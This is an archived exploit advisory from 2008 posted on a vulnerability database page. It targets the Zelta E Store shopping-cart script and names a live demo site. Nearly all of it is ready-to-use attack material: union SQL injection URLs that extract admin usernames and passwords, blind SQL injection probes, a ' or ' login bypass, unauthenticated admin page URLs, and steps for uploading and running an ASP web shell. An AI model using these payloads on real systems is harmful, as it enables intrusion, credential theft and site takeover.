Lucene search

K

Zelta E Store Multiple Vulnerabilities

🗓️ 17 Dec 2008 00:00:00Reported by ZoRLuType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 23 Views

Zelta E Store Multiple Remote Vulnerabilities discovered by ZoRLu including R-SQL, B-SQL, auth bypass, and admin bypass exploits

Show more

5 of 5AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
`[~] Zelta E Store RFU/BYPASS/R-SQL/B-SQL Multiple Remote Vulns.   
[~]  
[~] script: http://www.zeltatrade.com/  
[~]  
[~] ----------------------------------------------------------  
[~] Discovered By: ZoRLu msn: [email protected]  
[~]  
[~] Date: 16/12/2008  
[~]  
[~] Home: www.z0rlu.blogspot.com  
[~]  
[~] dangerous-unit (D-Unit): ZoRLu & SuB-ZeRo   
[~]  
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (  
[~] -----------------------------------------------------------  
  
exp for demo: (R-SQL)  
  
user: http://joineazy.com/store/productsofcat.asp?p=1&category_id=17+union+select+1,adminlogin,3,4+from+admin  
  
pass: http://joineazy.com/store/productsofcat.asp?p=1&category_id=17+union+select+1,adminpass,3,4+from+admin  
  
  
exp for demo: (B-SQL)  
  
http://joineazy.com/store/productsofcat.asp?p=1&category_id=17+and+1=1 (true)  
  
http://joineazy.com/store/productsofcat.asp?p=1&category_id=17+and+1=100 (false)  
  
  
exp for demo: (auth bypass)  
  
http://joineazy.com/members/login.asp  
  
username: [email protected]  
  
pass: ' or '  
  
  
exp for demo: (admin bypass)  
  
http://joineazy.com/embadmin/admin_main.asp  
  
http://joineazy.com/embadmin/site_setup.asp  
  
http://joineazy.com/embadmin/main_baseimage.asp  
  
  
exp for demo: (RFU)  
  
firs you register to site  
  
login to site and edit your pictures select your shell.asp  
  
go your shell asp:  
  
http://joineazy.com/members/member_pictures/shell.asp  
  
[~]----------------------------------------------------------------------  
[~] Greetz tO: str0ke   
[~]  
[~] yildirimordulari.org & darkc0de.com  
[~]  
[~]----------------------------------------------------------------------  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
17 Dec 2008 00:00Current
0.3Low risk
Vulners AI Score0.3
23
.json
Report